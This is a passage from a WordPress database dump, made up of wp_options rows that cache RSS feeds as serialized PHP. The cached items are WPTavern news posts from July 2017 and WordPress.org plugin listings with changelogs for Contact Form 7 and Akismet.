</li>\n</ul>\n<p>	<strong>La Lombada</strong><br />\nThis release is named after what is thought to the oldest and thus first Italian restaurant in the UK established circa 1922 in Aberdeen.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 31 Jul 2017 21:39:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:12:"Hugo Ashmore";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:47;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:114:"WPTavern: Dmitry Mayorov Discusses the Challenges of Organizing WordCamp Moscow and the Future of WordPress Themes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=69311";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:125:"https://wptavern.com/dmitry-mayorov-discusses-the-challenges-of-organizing-wordcamp-moscow-and-the-future-of-wordpress-themes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2956:"<p>While at WordCamp Europe I had the opportunity to meet Russian designer and developer <a href="https://dmtrmrv.com/" target="_blank">Dmitry Mayorov</a>, whose themes I had noticed earlier in the year in the <a href="https://wordpress.org/themes/author/iamdmitrymayorov/" target="_blank">WordPress Theme Directory</a>. Mayorov&#8217;s design style is reminiscent of other niche theme developers like Anders Norén and Mike McAlister. He launched his own commercial themes business on <a href="https://themepatio.com/" target="_blank">ThemePatio.com</a> two years ago and his free <a href="https://wordpress.org/themes/counter/" target="_blank">Counter</a> and <a href="https://wordpress.org/themes/maker/" target="_blank">Maker</a> themes collectively have more than 3,000 active installs on WordPress.org.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/04/counter.png?ssl=1"><img /></a><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/04/maker.png?ssl=1"><img /></a></p>\n<p>&nbsp; </p>\n<p>Mayorov started taking part in meetups in Russia in 2013. Following WordCamp Moscow 2015, Konstantin Kovshenin asked him if he would take on the role of lead organizer. Mayorov is organizing <a href="https://2017.moscow.wordcamp.org/" target="_blank">WordCamp Moscow 2017</a>, which is scheduled for August 12. In our interview below, he describes a few of the challenges organizers face in uniting the Russian WordPress community that is spread out over such a large land mass.</p>\n<p>Mayorov also discusses how he began creating WordPress themes and how clients&#8217; needs influenced his <a href="https://themepatio.com/about/" target="_blank">theme development philosophy</a>. He aspires to create themes that are fast, content-focused, and minimalistic, without the bloat of hundreds of font options and pre-built site layouts. Mayorov also gave us his predictions for the future of the theme industry.</p>\n<p>&#8220;I think it&#8217;s going to go two directions at the same time,&#8221; Mayorov said. &#8220;I think that page builders and multi-purpose themes wont go anywhere but I also think that niche themes are here to stay as well. Not everybody is looking for a page builder.</p>\n<p>&#8220;I see the tendency that at first when people get introduced to WordPress they discover theme marketplaces. They think, &#8216;Ok this is the top seller, I&#8217;m going to go with this theme.&#8217; For some people it works, and there&#8217;s nothing wrong with that, because sometimes you have challenges where you need to create a website like yesterday&#8230;Once they see that there is another way, they start to research other theme developers and shops, realizing that there are simple themes that work faster and are easier to use, and that you don&#8217;t need to spend two hours trying to create the homepage. They will use those themes as well. These are the themes I&#8217;m trying to build.&#8221;</p>\n<p></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 28 Jul 2017 19:57:36 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:48;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:81:"WPTavern: Customize Snapshots 0.6.0 Adds the Ability to Name and Merge Changesets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73700";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:92:"https://wptavern.com/customize-snapshots-0-6-0-adds-the-ability-to-name-and-merge-changesets";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5032:"<a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/07/snapshots.jpg?ssl=1"><img /></a>photo credit: <a href="https://stocksnap.io/photo/T80PGTWXHZ">Freestocks.org</a>\n<p>Contributors to the <a href="https://wordpress.org/plugins/customize-snapshots/" target="_blank">Customize Snapshots</a> feature plugin are steadily building a UI for managing Customizer changesets using the changesets infrastructure added in WordPress 4.7. <a href="https://make.xwp.co/2017/07/27/customize-snapshots-0-6-release/" target="_blank">Version 0.6.0</a> of the plugin was released this month with an expanded interface for managing the complexities of multi-user editing in the Customizer.</p>\n<p>The previous version of Customize Snapshots already supported scheduling but this release introduces a new multi-select save button that allows users to publish, save draft, save as pending, or schedule changes.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/07/customize-snapshots-multi-select-button.png?ssl=1"><img /></a></p>\n<p>Version 0.6.0 adds the ability to name changesets, which is especially helpful for site owners who are sorting and previewing changes submitted by multiple editors. The list of changesets has links for previewing on the frontend, editing in the Customizer, or inspecting the changeset&#8217;s content on the edit post screen.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/07/saved-changesets.png?ssl=1"><img /></a></p>\n<p>This release introduces the ability to merge multiple changesets into a single changeset, which users can then preview and publish all at once.</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/07/merge-changesets.png?ssl=1"><img /></a></p>\n<p>Contributors have not yet worked out how this feature will handle conflicting changes submitted by multiple users. It currently accepts whatever change was made more recently, but this isn&#8217;t ideal in certain situations. <a href="https://github.com/xwp/wp-customize-snapshots/issues?q=is%3Aissue%20is%3Aopen%20conflict" target="_blank">Conflict resolution</a> is on the team&#8217;s radar to address in future iterations of the plugin and they are discussing several different approaches.</p>\n<p>&#8220;Merging changesets would definitely lie in the realm of a power user feature,&#8221; Customize component co-maintainer Weston Ruter said. &#8220;It would probably not be proposed for core. Nevertheless, the existence of the feature is a demonstration of the kinds of things that can be possible when working with changesets.&#8221;</p>\n<p>In addition to co-leading WordPress&#8217; Customizer team, Ruter is also the CTO at XWP, where several of the agency&#8217;s clients are actively using the Customize Snapshots plugin. News Corp Australia and Beachbody are two companies that have invested in the plugin&#8217;s development and are successfully using it at scale on their network of sites.</p>\n<p>&#8220;When paired with the Customize Posts plugin, it gets really powerful because you can edit multiple posts and pages, along with any of their postmeta, while also editing widgets, nav menus, and any other settings, and all of these changes are all bundled together in a single changeset,&#8221; Ruter said. &#8220;This changeset can then be previewed on the frontend, including by sharing the URL with an unauthenticated user (like a 3rd party who can&#8217;t even access the Customizer), and they can click around the site with all of the customizations applied as if they had been published.&#8221;</p>\n<p>Ruter said the Customizer team isn&#8217;t currently targeting a WordPress release for getting these new UI additions added to core but rather view the progress as &#8220;prototypes for what could be merged into core, bit by bit.&#8221; He identified several tickets that the plugin provides prototype interfaces for:</p>\n<ul>\n<li><a href="https://core.trac.wordpress.org/ticket/28721" target="_blank">#28721</a>: Scheduled changes for the customizer</li>\n<li><a href="https://core.trac.wordpress.org/ticket/31089" target="_blank">#31089</a>: Add revisions and statuses for changesets</li>\n<li><a href="https://core.trac.wordpress.org/ticket/21666" target="_blank">#21666</a>: Customizer reset/undo/revert</li>\n<li><a href="https://core.trac.wordpress.org/ticket/39896" target="_blank">#39896</a>: Customizer: Allow users to Draft changes before Publishing</li>\n</ul>\n<p>&#8220;Core development is still very much focused on the editor — Gutenberg — so the far-reaching Customizer changes are not being emphasized yet,&#8221; Ruter said. Meanwhile progress continues on the Customize Snapshots plugin, which was completely rewritten for the 0.6.0 release after most of its infrastructure was merged into WordPress 4.7. Ruter&#8217;s team is not sure which features will eventually land in core, but the various Customizer feature plugins give users an idea of the power of the changesets infrastructure that is already included in WordPress.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 27 Jul 2017 22:58:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:49;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:83:"WPTavern: .blog Passes 100,000 Registrations, 66.5% of Purchased Domains are in Use";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=73673";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:90:"https://wptavern.com/blog-passes-100000-registrations-66-5-of-purchased-domains-are-in-use";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5297:"<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/07/blog.png?ssl=1"><img /></a></p>\n<p>The .blog domain extension, managed by Automattic subsidiary Knock Knock WHOIS There (KKWT), opened registration to the public in November 2016 and has just <a href="https://my.blog/2017/07/26/100000-blogs/" target="_blank">passed the 100,000 registration milestone</a>. The extension is averaging 300 new .blog domains registered per day and is quickly gaining popularity among new generic TLDs. According to the most recent stats available at nTLDStats, <a href="https://ntldstats.com/tld/blog" target="_blank">.blog registrations</a> have climbed steadily and predictably every month since its public launch.</p>\n<a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/07/blog-registrations.png?ssl=1"><img /></a>.blog registrations according to ntldstats.com\n<p>Automattic, which operates independently from KKWT as a registrar, currently has the largest market share of .blog domain registrars at 62.8%. Other smaller pieces of the pie continue to see increasing numbers of registrations. </p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/07/registrar-market-share-blog.png?ssl=1"><img /></a></p>\n<p>&#8220;When a .blog domain is sold through any .blog registrar, it operates like all other top-level domains (TLDs),&#8221; .blog representative Erica Varlese said. &#8220;This means that the registry, in this case Knock Knock WHOIS There, receives the wholesale cost, ICANN receives their fees, and the registrar retains the rest.&#8221;</p>\n<p>The .blog team has started experimenting with different marketing programs to promote the extension among registrars and launched its first campaigns last month.</p>\n<p>&#8220;These programs are available to any .blog accredited registrar and, through participation, allows them to provide .blog domains to their customers at a discounted rate,&#8221; Varlese said. &#8220;It is designed to test price elasticity and various end-user marketing techniques that best fit each registrars&#8217; unique customer-base.&#8221;</p>\n<p>Registration for .blog domains is fully integrated into WordPress.com&#8217;s domain offerings, but Varlese said that Knock Knock WHOIS There, as a separate company, is not informed of the specific details of their domain roadmap. The subsidiary also does not track how many of the .blog domains are running WordPress, as the extension is platform agnostic and in use across many different blogging services. </p>\n<p>So far .blog domain customers include both individuals and businesses, including some e-commerce and community sites. Varlese said the main benefit to acquiring a .blog domain is that customers are more likely to get and use a name they always wanted (example.blog), versus settling for a more complicated variation, such as blog.example.com.</p>\n<p>&#8220;Using a blog domain is also a great way to embrace engagement with your community,&#8221; Varlese said. &#8220;In addition to individual and personal bloggers, we also see larger brands using blogs to engage with their customers. Visiting <a href="http://stackoverflow.blog" target="_blank">stackoverflow.blog</a>, for example, is intuitive. The domain lets me know right away what type of content and interaction to expect versus what my expectations would be when prompted to visit stackoverflow.com. Both are equally important and both add value to the customer’s online experience.&#8221;</p>\n<p>Many people purchase a domain just to sit on it for the right time to use it or sell. Greater usage of .blog domains promotes visibility on the web, which is why registrars place value on how many have launched websites using the extension. </p>\n<p>&#8220;Our goal is steady, long-term growth while continuing to increase our usage rates,&#8221; Varlese said. &#8220;We want every .blog domain to resolve to a unique content site or blog. Usage is an important metric for us. It positively contributes to help the new TLD marketplace thrive and grow organically. It is at the forefront of every decision we make, including marketing and rebate programs for our registrars, as well as our dotblogger program, which gives online influencers easy access to all .blog domains, including premium and reserved domains.&#8221;</p>\n<p>The .blog team&#8217;s 100,000 registrations milestone post cites usage stats from Pandalytics, a domains data service, that are not publicly available. </p>\n<p>&#8220;66.5% of .blog domains have a unique website associated with them, compared to an average of 39.3% for both new and legacy TLDs, according to recent research by Daniel Ruzzini-Mejia (co-founder and CSO of DomainsBot Srl, the company behind big-data analysis platform Pandalytics),&#8221; Varlese said. &#8220;Ruzzini-Mejia also found more than 250 .blog domains that use an eCommerce platform.&#8221; </p>\n<p>This is an interesting find in an era where many have claimed that blogs are dead. If the indie web proponents have their way, blogs may have another renaissance yet, and could become the anchors of commerce and identity online. The healthy usage numbers the .blog extension has posted in its first year are a strong indicator that the concept of blogging still holds an important place on the web. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 27 Jul 2017 18:09:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:8:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Tue, 22 Aug 2017 14:04:16 GMT";s:12:"content-type";s:8:"text/xml";s:4:"vary";s:15:"Accept-Encoding";s:13:"last-modified";s:29:"Tue, 22 Aug 2017 13:45:10 GMT";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:11:"HIT lax 250";s:16:"content-encoding";s:4:"gzip";}}s:5:"build";s:14:"20130911040210";}', 'no'); 
INSERT INTO `wp_options` VALUES (693207, '_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1503453856', 'no'); 
INSERT INTO `wp_options` VALUES (693208, '_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1503410656', 'no'); 
INSERT INTO `wp_options` VALUES (693209, '_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109', '1503453857', 'no'); 
INSERT INTO `wp_options` VALUES (693210, '_transient_feed_b9388c83948825c1edaef0d856b7b109', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:3:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:29:"Popular — WordPress Plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wordpress.org/plugins";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:57:"Plugins extend and expand the functionality of WordPress.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 22 Aug 2017 13:50:31 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:40:"https://wordpress.org/?v=4.9-alpha-41268";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:14:"Contact Form 7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:45:"https://wordpress.org/plugins/contact-form-7/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:53:"https://wordpress.org/plugins/contact-form-7/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 02 Aug 2007 12:43:39 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:48:"https://wordpress.org/plugins-wp/contact-form-7/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:54:"Just another contact form plugin. Simple but flexible.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:16:"Takayuki Miyoshi";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:5872:"<p><!--section=description--></p>\n<p>Contact Form 7 can manage multiple contact forms, plus you can customize the form and the mail contents flexibly with simple markup. The form supports Ajax-powered submitting, CAPTCHA, Akismet spam filtering and so on.</p>\n<h4>Docs &amp; Support</h4>\n<p>You can find <a href="https://contactform7.com/docs/" rel="nofollow">docs</a>, <a href="https://contactform7.com/faq/" rel="nofollow">FAQ</a> and more detailed information about Contact Form 7 on <a href="https://contactform7.com/" rel="nofollow">contactform7.com</a>. If you were unable to find the answer to your question on the FAQ or in any of the documentation, you should check the <a href="https://wordpress.org/support/plugin/contact-form-7/" rel="nofollow">support forum</a> on WordPress.org. If you can&#8217;t locate any topics that pertain to your particular issue, post a new topic for it.</p>\n<h4>Contact Form 7 Needs Your Support</h4>\n<p>It is hard to continue development and support for this free plugin without contributions from users like you. If you enjoy using Contact Form 7 and find it useful, please consider <a href="https://contactform7.com/donate/" rel="nofollow"><strong>making a donation</strong></a>. Your donation will help encourage and support the plugin&#8217;s continued development and better user support.</p>\n<h4>Recommended Plugins</h4>\n<p>The following plugins are recommended for Contact Form 7 users:</p>\n<ul>\n<li><a href="https://wordpress.org/plugins/flamingo/">Flamingo</a> by Takayuki Miyoshi &#8211; With Flamingo, you can save submitted messages via contact forms in the database.</li>\n<li><a href="https://wordpress.org/plugins/postman-smtp/">Postman</a> by<br />\nJason Hendriks &#8211; Postman is a next-generation SMTP Mailer, software that assists in the delivery of email generated by your WordPress site.</li>\n<li><a href="https://wordpress.org/plugins/bogo/">Bogo</a> by Takayuki Miyoshi &#8211; Bogo is a straight-forward multilingual plugin that doesn&#8217;t cause headaches.</li>\n</ul>\n<h4>Translations</h4>\n<p>You can <a href="https://contactform7.com/translating-contact-form-7/" rel="nofollow">translate Contact Form 7</a> on <a href="https://translate.wordpress.org/projects/wp-plugins/contact-form-7" rel="nofollow"><strong>translate.wordpress.org</strong></a>.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Upload the entire <code>contact-form-7</code> folder to the <code>/wp-content/plugins/</code> directory.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress.</li>\n</ol>\n<p>You will find &#8216;Contact&#8217; menu in your WordPress admin panel.</p>\n<p>For basic usage, you can also have a look at the <a href="https://contactform7.com/" rel="nofollow">plugin web site</a>.</p>\n<p><!--section=faq--></p>\n<p>Do you have questions or issues with Contact Form 7? Use these support channels appropriately.</p>\n<ol>\n<li><a href="https://contactform7.com/docs/" rel="nofollow">Docs</a></li>\n<li><a href="https://contactform7.com/faq/" rel="nofollow">FAQ</a></li>\n<li><a href="https://wordpress.org/support/plugin/contact-form-7/" rel="nofollow">Support Forum</a></li>\n</ol>\n<p><a href="https://contactform7.com/support/" rel="nofollow">Support</a></p>\n<dl>\n<dt>Installation Instructions</dt>\n<dd>\n<ol>\n<li>Upload the entire <code>contact-form-7</code> folder to the <code>/wp-content/plugins/</code> directory.</li>\n<li>Activate the plugin through the &#8216;Plugins&#8217; menu in WordPress.</li>\n</ol>\n<p>You will find &#8216;Contact&#8217; menu in your WordPress admin panel.</p>\n<p>For basic usage, you can also have a look at the <a href="https://contactform7.com/" rel="nofollow">plugin web site</a>.</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<p>For more information, see <a href="https://contactform7.com/category/releases/" rel="nofollow">Releases</a>.</p>\n<h4>4.9</h4>\n<ul>\n<li>Supports subscribers_only setting</li>\n<li>Changes the default value of WPCF7_VERIFY_NONCE to false</li>\n<li>WPCF7_FormTagsManager::collect_tag_types() supports invert option</li>\n<li>New filter hooks: wpcf7_verify_nonce, wpcf7_subscribers_only_notice, wpcf7_remote_ip_addr, and wpcf7_submission_is_blacklisted</li>\n<li>Fixed: Form-tag&#8217;s tabindex option did not accept 0 or negative integer values</li>\n<li>Shows a validation error when no option in a radio buttons group is checked</li>\n<li>Config validator: Adds a validation rule against the use of deprecated settings (on_sent_ok and on_submit)</li>\n<li>Allows to pass the skip_mail option through the WPCF7_ContactForm::submit() and WPCF7_Submission::get_instance() function parameters.</li>\n<li>Triggers wpcf7beforesubmit custom DOM event. You can manipulate the formData object through an event handler.</li>\n</ul>\n<h4>4.8.1</h4>\n<ul>\n<li>wpcf7.initForm JavaScript function added to isolate form initialization process.</li>\n<li>Fix response message duplication caused by repeated click on submit button.</li>\n<li>Clear $phpmailer-&gt;AltBody to avoid unintended inheritance from previous wp_mail() calls.</li>\n<li>Fix incorrect character count of textarea input.</li>\n<li>Akismet: Exclude the comment_author, comment_author_email, and comment_author_url values from the comment_content value.</li>\n<li>REST API: More reliable approach to build route URLs.</li>\n<li>Include free_text inputs into event.detail.inputs.</li>\n</ul>\n<h4>4.8</h4>\n<ul>\n<li>Stopped using jquery.form.js.</li>\n<li>Added custom REST API endpoints for Ajax form submissions.</li>\n<li>WPCF7_FormTag class implements ArrayAccess interface.</li>\n<li>WPCF7_FormTagsManager::filter() filters form-tags based on features they support.</li>\n<li>New form-tag features: do-not-store, display-block, and display-hidden</li>\n<li>Removed inappropriate content from h1 headings.</li>\n<li>Added the support of size:invisible option to the reCAPTCHA form-tag.</li>\n</ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:50:"https://wordpress.org/plugins/contact-form-7/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:7:"Akismet";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:38:"https://wordpress.org/plugins/akismet/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:47:"https://wordpress.org/plugins/akismet/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 20 Oct 2005 08:57:41 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:41:"https://wordpress.org/plugins-wp/akismet/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:103:"Akismet checks your comments and contact form submissions against our global database of spam to&#8230;";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:10:"Automattic";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:19395:"<p><!--section=description--></p>\n<p>Akismet checks your comments and contact form submissions against our global database of spam to prevent your site from publishing malicious content. You can review the comment spam it catches on your blog&#8217;s &#8220;Comments&#8221; admin screen.</p>\n<p>Major features in Akismet include:</p>\n<ul>\n<li>Automatically checks all 